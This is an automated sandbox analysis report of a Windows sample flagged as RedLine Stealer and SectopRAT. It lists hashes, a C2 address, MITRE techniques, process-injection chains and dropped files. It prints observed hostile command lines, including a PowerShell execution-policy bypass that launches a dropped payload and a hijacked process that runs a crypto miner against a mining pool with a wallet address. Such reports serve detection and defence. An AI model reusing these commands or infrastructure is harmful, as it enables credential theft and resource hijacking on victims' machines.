redline | 3d19662ef649bd52895dedbbe8bf4e54fd2b667440fcb9a8baefb71f350eba31

Analysis

max time kernel
149s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
24-11-2024 02:10

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

3d19662ef649bd52895dedbbe8bf4e54fd2b667440fcb9a8baefb71f350eba31.exe
Size

2.3MB
MD5

730a8f0e0a80be36bf9ba0e6cc839e77
SHA1

ceefe9311b024144e5ea3af32b4f33a48f90fa2f
SHA256

3d19662ef649bd52895dedbbe8bf4e54fd2b667440fcb9a8baefb71f350eba31
SHA512

c83849f9f8cf0407fbbe3f300660e907122f21bc3b554d1d372e2b408be3e9adb560e27b5fd8473abadb5bc8544a779f91d7437e1140cc1e8588773cc1a8c705
SSDEEP

49152:y4XP96ykubgOg0ETAVlCOZ2vz9/HQi+Ty5:l9jbghcCi2vzxwi+Ty

Score

10^/10

redline sectoprat ishop discovery execution infostealer rat spyware trojan

Malware Config

Extracted

Family

redline

Botnet

iShop

venom.underground-cheat.com:1337

Signatures

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 1 IoCs

Processes:

resource	yara_rule
behavioral2/memory/792-2228-0x00000000001D0000-0x00000000001EE000-memory.dmp	family_redline

Redline family
redline
SectopRAT
SectopRAT is a remote access trojan first seen in November 2019.
trojan rat sectoprat

SectopRAT payload 1 IoCs

Processes:

resource	yara_rule
behavioral2/memory/792-2228-0x00000000001D0000-0x00000000001EE000-memory.dmp	family_sectoprat

Sectoprat family
sectoprat

Suspicious use of NtCreateUserProcessOtherParentProcess 6 IoCs

Processes:

3d19662ef649bd52895dedbbe8bf4e54fd2b667440fcb9a8baefb71f350eba31.exebuild3.exepurevenom64bit.exeeimdbt.exeMSBuild.exeInnerException.exe

description	pid	process	target process
PID 3096 created 3436	3096	3d19662ef649bd52895dedbbe8bf4e54fd2b667440fcb9a8baefb71f350eba31.exe	Explorer.EXE
PID 4644 created 3436	4644	build3.exe	Explorer.EXE
PID 4316 created 3436	4316	purevenom64bit.exe	Explorer.EXE
PID 3080 created 3436	3080	eimdbt.exe	Explorer.EXE
PID 1976 created 3436	1976	MSBuild.exe	Explorer.EXE
PID 4672 created 3436	4672	InnerException.exe	Explorer.EXE

Downloads MZ/PE file

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

3d19662ef649bd52895dedbbe8bf4e54fd2b667440fcb9a8baefb71f350eba31.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation	3d19662ef649bd52895dedbbe8bf4e54fd2b667440fcb9a8baefb71f350eba31.exe

Drops startup file 2 IoCs

Processes:

3d19662ef649bd52895dedbbe8bf4e54fd2b667440fcb9a8baefb71f350eba31.exepurevenom64bit.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Remaining.vbs	3d19662ef649bd52895dedbbe8bf4e54fd2b667440fcb9a8baefb71f350eba31.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\FailedAssemblyInfo.vbs	purevenom64bit.exe

Executes dropped EXE 7 IoCs

Processes:

build3.exepurevenom64bit.exepurevenom64bit.exeeimdbt.exeInnerException.exeeimdbt.exeInnerException.exe

pid process

4644 build3.exe
4316 purevenom64bit.exe
652 purevenom64bit.exe
3080 eimdbt.exe
4672 InnerException.exe
3896 eimdbt.exe
2516 InnerException.exe
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Start PowerShell.
execution

PowerShell
T1059.001

Processes:

powershell.exe

pid process

4784 powershell.exe

pid	process
4644	build3.exe
4316	purevenom64bit.exe
652	purevenom64bit.exe
3080	eimdbt.exe
4672	InnerException.exe
3896	eimdbt.exe
2516	InnerException.exe

pid	process
4784	powershell.exe

Suspicious use of SetThreadContext 8 IoCs

Processes:

3d19662ef649bd52895dedbbe8bf4e54fd2b667440fcb9a8baefb71f350eba31.exebuild3.exepurevenom64bit.exeeimdbt.exeeimdbt.exeMSBuild.exeInnerException.exeMSBuild.exe

description	pid	process	target process
PID 3096 set thread context of 3064	3096	3d19662ef649bd52895dedbbe8bf4e54fd2b667440fcb9a8baefb71f350eba31.exe	InstallUtil.exe
PID 4644 set thread context of 792	4644	build3.exe	InstallUtil.exe
PID 4316 set thread context of 652	4316	purevenom64bit.exe	purevenom64bit.exe
PID 3080 set thread context of 3896	3080	eimdbt.exe	eimdbt.exe
PID 3896 set thread context of 1976	3896	eimdbt.exe	MSBuild.exe
PID 1976 set thread context of 2612	1976	MSBuild.exe	MSBuild.exe
PID 4672 set thread context of 2516	4672	InnerException.exe	InnerException.exe
PID 2612 set thread context of 4520	2612	MSBuild.exe	AddInProcess.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

1516 3360 WerFault.exe InstallUtil.exe

pid	pid_target	process	target process
1516	3360	WerFault.exe	InstallUtil.exe

System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

3d19662ef649bd52895dedbbe8bf4e54fd2b667440fcb9a8baefb71f350eba31.exebuild3.exeInstallUtil.execmd.exepowershell.exeInstallUtil.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	3d19662ef649bd52895dedbbe8bf4e54fd2b667440fcb9a8baefb71f350eba31.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	build3.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	InstallUtil.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	InstallUtil.exe

Suspicious behavior: EnumeratesProcesses 51 IoCs

Processes:

3d19662ef649bd52895dedbbe8bf4e54fd2b667440fcb9a8baefb71f350eba31.exepowershell.exebuild3.exeInstallUtil.exepurevenom64bit.exeInstallUtil.exeeimdbt.exeMSBuild.exeMSBuild.exeInnerException.exe

pid	process
3096	3d19662ef649bd52895dedbbe8bf4e54fd2b667440fcb9a8baefb71f350eba31.exe
4784	powershell.exe
4644	build3.exe
4784	powershell.exe
3064	InstallUtil.exe
4316	purevenom64bit.exe
792	InstallUtil.exe
792	InstallUtil.exe
3080	eimdbt.exe
1976	MSBuild.exe
2612	MSBuild.exe
2612	MSBuild.exe
2612	MSBuild.exe
2612	MSBuild.exe
2612	MSBuild.exe
4672	InnerException.exe
2612	MSBuild.exe
2612	MSBuild.exe
2612	MSBuild.exe
2612	MSBuild.exe
2612	MSBuild.exe
2612	MSBuild.exe
2612	MSBuild.exe
2612	MSBuild.exe
2612	MSBuild.exe
2612	MSBuild.exe
2612	MSBuild.exe
2612	MSBuild.exe
2612	MSBuild.exe
2612	MSBuild.exe
2612	MSBuild.exe
2612	MSBuild.exe
2612	MSBuild.exe
2612	MSBuild.exe
2612	MSBuild.exe
2612	MSBuild.exe
2612	MSBuild.exe
2612	MSBuild.exe
2612	MSBuild.exe
2612	MSBuild.exe
2612	MSBuild.exe
2612	MSBuild.exe
2612	MSBuild.exe
2612	MSBuild.exe
2612	MSBuild.exe
2612	MSBuild.exe
2612	MSBuild.exe
2612	MSBuild.exe
2612	MSBuild.exe
2612	MSBuild.exe
2612	MSBuild.exe

Suspicious use of AdjustPrivilegeToken 20 IoCs

Processes:

3d19662ef649bd52895dedbbe8bf4e54fd2b667440fcb9a8baefb71f350eba31.exebuild3.exeInstallUtil.exepowershell.exeInstallUtil.exepurevenom64bit.exepurevenom64bit.exeeimdbt.exeeimdbt.exeMSBuild.exeMSBuild.exeInnerException.exeAddInProcess.exe

description	pid	process
Token: SeDebugPrivilege	3096	3d19662ef649bd52895dedbbe8bf4e54fd2b667440fcb9a8baefb71f350eba31.exe
Token: SeDebugPrivilege	3096	3d19662ef649bd52895dedbbe8bf4e54fd2b667440fcb9a8baefb71f350eba31.exe
Token: SeDebugPrivilege	4644	build3.exe
Token: SeDebugPrivilege	3064	InstallUtil.exe
Token: SeDebugPrivilege	4784	powershell.exe
Token: SeDebugPrivilege	4644	build3.exe
Token: SeDebugPrivilege	792	InstallUtil.exe
Token: SeDebugPrivilege	4316	purevenom64bit.exe
Token: SeDebugPrivilege	4316	purevenom64bit.exe
Token: SeDebugPrivilege	652	purevenom64bit.exe
Token: SeDebugPrivilege	3080	eimdbt.exe
Token: SeDebugPrivilege	3080	eimdbt.exe
Token: SeDebugPrivilege	3896	eimdbt.exe
Token: SeDebugPrivilege	1976	MSBuild.exe
Token: SeDebugPrivilege	1976	MSBuild.exe
Token: SeDebugPrivilege	2612	MSBuild.exe
Token: SeDebugPrivilege	4672	InnerException.exe
Token: SeDebugPrivilege	4672	InnerException.exe
Token: SeLockMemoryPrivilege	4520	AddInProcess.exe
Token: SeLockMemoryPrivilege	4520	AddInProcess.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

AddInProcess.exe

pid process

4520 AddInProcess.exe

pid	process
4520	AddInProcess.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

3d19662ef649bd52895dedbbe8bf4e54fd2b667440fcb9a8baefb71f350eba31.exeInstallUtil.execmd.exebuild3.exepowershell.exepurevenom64bit.exeInstallUtil.exeeimdbt.exeeimdbt.exeMSBuild.exeInnerException.exeMSBuild.exe

description	pid	process	target process
PID 3096 wrote to memory of 4644	3096	3d19662ef649bd52895dedbbe8bf4e54fd2b667440fcb9a8baefb71f350eba31.exe	build3.exe
PID 3096 wrote to memory of 4644	3096	3d19662ef649bd52895dedbbe8bf4e54fd2b667440fcb9a8baefb71f350eba31.exe	build3.exe
PID 3096 wrote to memory of 4644	3096	3d19662ef649bd52895dedbbe8bf4e54fd2b667440fcb9a8baefb71f350eba31.exe	build3.exe
PID 3096 wrote to memory of 3064	3096	3d19662ef649bd52895dedbbe8bf4e54fd2b667440fcb9a8baefb71f350eba31.exe	InstallUtil.exe
PID 3096 wrote to memory of 3064	3096	3d19662ef649bd52895dedbbe8bf4e54fd2b667440fcb9a8baefb71f350eba31.exe	InstallUtil.exe
PID 3096 wrote to memory of 3064	3096	3d19662ef649bd52895dedbbe8bf4e54fd2b667440fcb9a8baefb71f350eba31.exe	InstallUtil.exe
PID 3096 wrote to memory of 3064	3096	3d19662ef649bd52895dedbbe8bf4e54fd2b667440fcb9a8baefb71f350eba31.exe	InstallUtil.exe
PID 3096 wrote to memory of 3064	3096	3d19662ef649bd52895dedbbe8bf4e54fd2b667440fcb9a8baefb71f350eba31.exe	InstallUtil.exe
PID 3096 wrote to memory of 3064	3096	3d19662ef649bd52895dedbbe8bf4e54fd2b667440fcb9a8baefb71f350eba31.exe	InstallUtil.exe
PID 3096 wrote to memory of 3064	3096	3d19662ef649bd52895dedbbe8bf4e54fd2b667440fcb9a8baefb71f350eba31.exe	InstallUtil.exe
PID 3096 wrote to memory of 3064	3096	3d19662ef649bd52895dedbbe8bf4e54fd2b667440fcb9a8baefb71f350eba31.exe	InstallUtil.exe
PID 3096 wrote to memory of 3360	3096	3d19662ef649bd52895dedbbe8bf4e54fd2b667440fcb9a8baefb71f350eba31.exe	InstallUtil.exe
PID 3096 wrote to memory of 3360	3096	3d19662ef649bd52895dedbbe8bf4e54fd2b667440fcb9a8baefb71f350eba31.exe	InstallUtil.exe
PID 3096 wrote to memory of 3360	3096	3d19662ef649bd52895dedbbe8bf4e54fd2b667440fcb9a8baefb71f350eba31.exe	InstallUtil.exe
PID 3096 wrote to memory of 3360	3096	3d19662ef649bd52895dedbbe8bf4e54fd2b667440fcb9a8baefb71f350eba31.exe	InstallUtil.exe
PID 3064 wrote to memory of 4084	3064	InstallUtil.exe	cmd.exe
PID 3064 wrote to memory of 4084	3064	InstallUtil.exe	cmd.exe
PID 3064 wrote to memory of 4084	3064	InstallUtil.exe	cmd.exe
PID 4084 wrote to memory of 4784	4084	cmd.exe	powershell.exe
PID 4084 wrote to memory of 4784	4084	cmd.exe	powershell.exe
PID 4084 wrote to memory of 4784	4084	cmd.exe	powershell.exe
PID 4644 wrote to memory of 792	4644	build3.exe	InstallUtil.exe
PID 4644 wrote to memory of 792	4644	build3.exe	InstallUtil.exe
PID 4644 wrote to memory of 792	4644	build3.exe	InstallUtil.exe
PID 4644 wrote to memory of 792	4644	build3.exe	InstallUtil.exe
PID 4644 wrote to memory of 792	4644	build3.exe	InstallUtil.exe
PID 4644 wrote to memory of 792	4644	build3.exe	InstallUtil.exe
PID 4644 wrote to memory of 792	4644	build3.exe	InstallUtil.exe
PID 4644 wrote to memory of 792	4644	build3.exe	InstallUtil.exe
PID 4784 wrote to memory of 4316	4784	powershell.exe	purevenom64bit.exe
PID 4784 wrote to memory of 4316	4784	powershell.exe	purevenom64bit.exe
PID 4316 wrote to memory of 652	4316	purevenom64bit.exe	purevenom64bit.exe
PID 4316 wrote to memory of 652	4316	purevenom64bit.exe	purevenom64bit.exe
PID 4316 wrote to memory of 652	4316	purevenom64bit.exe	purevenom64bit.exe
PID 4316 wrote to memory of 652	4316	purevenom64bit.exe	purevenom64bit.exe
PID 4316 wrote to memory of 652	4316	purevenom64bit.exe	purevenom64bit.exe
PID 4316 wrote to memory of 652	4316	purevenom64bit.exe	purevenom64bit.exe
PID 792 wrote to memory of 3080	792	InstallUtil.exe	eimdbt.exe
PID 792 wrote to memory of 3080	792	InstallUtil.exe	eimdbt.exe
PID 3080 wrote to memory of 3896	3080	eimdbt.exe	eimdbt.exe
PID 3080 wrote to memory of 3896	3080	eimdbt.exe	eimdbt.exe
PID 3080 wrote to memory of 3896	3080	eimdbt.exe	eimdbt.exe
PID 3080 wrote to memory of 3896	3080	eimdbt.exe	eimdbt.exe
PID 3080 wrote to memory of 3896	3080	eimdbt.exe	eimdbt.exe
PID 3080 wrote to memory of 3896	3080	eimdbt.exe	eimdbt.exe
PID 3896 wrote to memory of 1976	3896	eimdbt.exe	MSBuild.exe
PID 3896 wrote to memory of 1976	3896	eimdbt.exe	MSBuild.exe
PID 3896 wrote to memory of 1976	3896	eimdbt.exe	MSBuild.exe
PID 3896 wrote to memory of 1976	3896	eimdbt.exe	MSBuild.exe
PID 3896 wrote to memory of 1976	3896	eimdbt.exe	MSBuild.exe
PID 3896 wrote to memory of 1976	3896	eimdbt.exe	MSBuild.exe
PID 1976 wrote to memory of 2612	1976	MSBuild.exe	MSBuild.exe
PID 1976 wrote to memory of 2612	1976	MSBuild.exe	MSBuild.exe
PID 1976 wrote to memory of 2612	1976	MSBuild.exe	MSBuild.exe
PID 1976 wrote to memory of 2612	1976	MSBuild.exe	MSBuild.exe
PID 1976 wrote to memory of 2612	1976	MSBuild.exe	MSBuild.exe
PID 1976 wrote to memory of 2612	1976	MSBuild.exe	MSBuild.exe
PID 4672 wrote to memory of 2516	4672	InnerException.exe	InnerException.exe
PID 4672 wrote to memory of 2516	4672	InnerException.exe	InnerException.exe
PID 4672 wrote to memory of 2516	4672	InnerException.exe	InnerException.exe
PID 4672 wrote to memory of 2516	4672	InnerException.exe	InnerException.exe
PID 4672 wrote to memory of 2516	4672	InnerException.exe	InnerException.exe
PID 4672 wrote to memory of 2516	4672	InnerException.exe	InnerException.exe
PID 2612 wrote to memory of 4520	2612	MSBuild.exe	AddInProcess.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3436
- C:\Users\Admin\AppData\Local\Temp\3d19662ef649bd52895dedbbe8bf4e54fd2b667440fcb9a8baefb71f350eba31.exe
  "C:\Users\Admin\AppData\Local\Temp\3d19662ef649bd52895dedbbe8bf4e54fd2b667440fcb9a8baefb71f350eba31.exe"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Checks computer location settings
  - Drops startup file
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3096
- - C:\Users\Admin\AppData\Local\Temp\build3.exe
    "C:\Users\Admin\AppData\Local\Temp\build3.exe"
    3⤵
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4644
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
    3⤵
    PID:3360
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3360 -s 212
      4⤵
      Program crash
      PID:1516
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3064
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\purevenom64bit.exe"' & exit
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4084
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\purevenom64bit.exe"'
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:4784
    - - C:\Users\Admin\AppData\Local\Temp\purevenom64bit.exe
        
        "C:\Users\Admin\AppData\Local\Temp\purevenom64bit.exe"
        5⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Drops startup file
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:4316
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:792
- - C:\Users\Admin\AppData\Local\Temp\eimdbt.exe
    "C:\Users\Admin\AppData\Local\Temp\eimdbt.exe"
    3⤵
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3080
- C:\Users\Admin\AppData\Local\Temp\purevenom64bit.exe
  "C:\Users\Admin\AppData\Local\Temp\purevenom64bit.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:652
- C:\Users\Admin\AppData\Local\Temp\eimdbt.exe
  "C:\Users\Admin\AppData\Local\Temp\eimdbt.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3896
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
    3⤵
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1976
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe"
  2⤵
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2612
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe
    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u KAS:kaspa:qqjn2sfatk0dmj0x47yns4xlyp3avwp46mhum864y5kc3hcrajwy7v5npvpn8.RIG_CPU -p x --cpu-max-threads-hint=50
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of FindShellTrayWindow
    PID:4520
- C:\Users\Admin\AppData\Roaming\Access\InnerException.exe
  "C:\Users\Admin\AppData\Roaming\Access\InnerException.exe"
  2⤵
  - Executes dropped EXE
  PID:2516

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 3360 -ip 3360
1⤵
PID:5104

C:\Users\Admin\AppData\Roaming\Access\InnerException.exe
C:\Users\Admin\AppData\Roaming\Access\InnerException.exe
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4672

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hlr2yzpv.32s.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\build3.exe

Filesize
1.1MB

MD5
4768155f1d0f3ec4a085de7900913e24

SHA1
46ee283b4024851436bf77abd108642220771d02

SHA256
6116f7621822553a694dfe9e803d80c15a19744f8907c831f2a5c166819bf982

SHA512
d7d40e66f28336e2d476418eb348d016250c93452dddd4d11bd4fc56de6ef65bc1b374887f552804d430be189af8e32307ebc5f931eed11ae790dab16b644c13

Download Submit
C:\Users\Admin\AppData\Local\Temp\purevenom64bit.exe

Filesize
1.6MB

MD5
3e4461418de7a12e7951ccf51fe4d4d3

SHA1
d7332419080c1a8eaef111439feb71bda300a1d3

SHA256
96c7d1d5dab0c8060f3220816e3e49461ef328643d520545ffc8aa05ddd76760

SHA512
b01982718c3f62059f086c3274f9f8d1c98bbb9bcc187bfa466b369d08818cd2fe06e0949256eddbfd6f26b3fd5428ea8008d49adf6f233282f08c8dce4e9553

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp8E29.tmp

Filesize
40KB

MD5
a182561a527f929489bf4b8f74f65cd7

SHA1
8cd6866594759711ea1836e86a5b7ca64ee8911f

SHA256
42aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914

SHA512
9bc3bf5a82f6f057e873adebd5b7a4c64adef966537ab9c565fe7c4bb3582e2e485ff993d5ab8a6002363231958fabd0933b48811371b8c155eaa74592b66558

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp8E3E.tmp

Filesize
114KB

MD5
9a3be5cb8635e4df5189c9aaa9c1b3c0

SHA1
9a7ce80c8b4362b7c10294bb1551a6172e656f47

SHA256
958f70959a70caf02c0063fe80f12c4d4d3f822a9fd640a6685c345d98708c26

SHA512
5c538513eba7ebaf7028b924d992b4c32ca323ad44f7a31e21970ed6852ea8b54cf71b2f811e8bf97f2744ee151e001ea52ba43b61cd032cc5a4c886292aac65

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp8E6A.tmp

Filesize
48KB

MD5
349e6eb110e34a08924d92f6b334801d

SHA1
bdfb289daff51890cc71697b6322aa4b35ec9169

SHA256
c9fd7be4579e4aa942e8c2b44ab10115fa6c2fe6afd0c584865413d9d53f3b2a

SHA512
2a635b815a5e117ea181ee79305ee1baf591459427acc5210d8c6c7e447be3513ead871c605eb3d32e4ab4111b2a335f26520d0ef8c1245a4af44e1faec44574

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp8E70.tmp

Filesize
20KB

MD5
49693267e0adbcd119f9f5e02adf3a80

SHA1
3ba3d7f89b8ad195ca82c92737e960e1f2b349df

SHA256
d76e7512e496b7c8d9fcd3010a55e2e566881dc6dacaf0343652a4915d47829f

SHA512
b4b9fcecf8d277bb0ccbb25e08f3559e3fc519d85d8761d8ad5bca983d04eb55a20d3b742b15b9b31a7c9187da40ad5c48baa7a54664cae4c40aa253165cbaa2

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp8EA5.tmp

Filesize
116KB

MD5
f70aa3fa04f0536280f872ad17973c3d

SHA1
50a7b889329a92de1b272d0ecf5fce87395d3123

SHA256
8d782aa65de6db3538a14da82216e96d5e0a3c60496726e3541a8165bccc65f8

SHA512
30675c5c610d9aa32a4c4a4d9c3af7570823cd197f8d2a709222c78e2cd15304bbed80e233e3674ec2f6e33d1961c67fd6a46dc8ba8b1a301cd0722932c03c84

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp8EC0.tmp

Filesize
96KB

MD5
40f3eb83cc9d4cdb0ad82bd5ff2fb824

SHA1
d6582ba879235049134fa9a351ca8f0f785d8835

SHA256
cdd772b00ae53d4050150552b67028b7344bb1d345bceb495151cc969c27a0a0

SHA512
cdd4dbf0b1ba73464cd7c5008dc05458862e5f608e336b53638a14965becd4781cdea595fd6bd18d0bf402dccffd719da292a6ce67d359527b4691dc6d6d4cc2

Download Submit
memory/652-3405-0x0000016557790000-0x000001655789A000-memory.dmp

Filesize
1.0MB

Download
memory/652-3404-0x000001653D600000-0x000001653D608000-memory.dmp

Filesize
32KB

Download
memory/652-3403-0x0000000000400000-0x00000000004D0000-memory.dmp

Filesize
832KB

Download
memory/652-7383-0x000001653EF60000-0x000001653EFB6000-memory.dmp

Filesize
344KB

Download
memory/792-5306-0x0000000005D00000-0x0000000005EC2000-memory.dmp

Filesize
1.8MB

Download
memory/792-5415-0x0000000006400000-0x000000000692C000-memory.dmp

Filesize
5.2MB

Download
memory/792-2234-0x0000000004CA0000-0x0000000004DAA000-memory.dmp

Filesize
1.0MB

Download
memory/792-2233-0x00000000049F0000-0x0000000004A2C000-memory.dmp

Filesize
240KB

Download
memory/792-2232-0x0000000004950000-0x0000000004962000-memory.dmp

Filesize
72KB

Download
memory/792-2230-0x0000000005150000-0x0000000005768000-memory.dmp

Filesize
6.1MB

Download
memory/792-2228-0x00000000001D0000-0x00000000001EE000-memory.dmp

Filesize
120KB

Download
memory/3064-1364-0x00000000748D0000-0x0000000075080000-memory.dmp

Filesize
7.7MB

Download
memory/3064-1143-0x0000000000400000-0x0000000000438000-memory.dmp

Filesize
224KB

Download
memory/3064-7402-0x00000000077C0000-0x000000000795E000-memory.dmp

Filesize
1.6MB

Download
memory/3064-7382-0x0000000006F40000-0x0000000006F4E000-memory.dmp

Filesize
56KB

Download
memory/3064-2210-0x0000000006E00000-0x0000000006E1E000-memory.dmp

Filesize
120KB

Download
memory/3064-2209-0x0000000005F50000-0x0000000005F5E000-memory.dmp

Filesize
56KB

Download
memory/3064-2208-0x0000000006E40000-0x0000000006EB6000-memory.dmp

Filesize
472KB

Download
memory/3064-2207-0x00000000748D0000-0x0000000075080000-memory.dmp

Filesize
7.7MB

Download
memory/3064-2206-0x00000000748D0000-0x0000000075080000-memory.dmp

Filesize
7.7MB

Download
memory/3064-2205-0x0000000005CF0000-0x0000000005D56000-memory.dmp

Filesize
408KB

Download
memory/3064-2204-0x0000000005C50000-0x0000000005CEC000-memory.dmp

Filesize
624KB

Download
memory/3064-2200-0x00000000773D1000-0x00000000773D2000-memory.dmp

Filesize
4KB

Download
memory/3064-1779-0x00000000748D0000-0x0000000075080000-memory.dmp

Filesize
7.7MB

Download
memory/3096-55-0x0000000005400000-0x00000000055F2000-memory.dmp

Filesize
1.9MB

Download
memory/3096-5-0x00000000056A0000-0x0000000005732000-memory.dmp

Filesize
584KB

Download
memory/3096-9-0x0000000005400000-0x00000000055F2000-memory.dmp

Filesize
1.9MB

Download
memory/3096-31-0x0000000005400000-0x00000000055F2000-memory.dmp

Filesize
1.9MB

Download
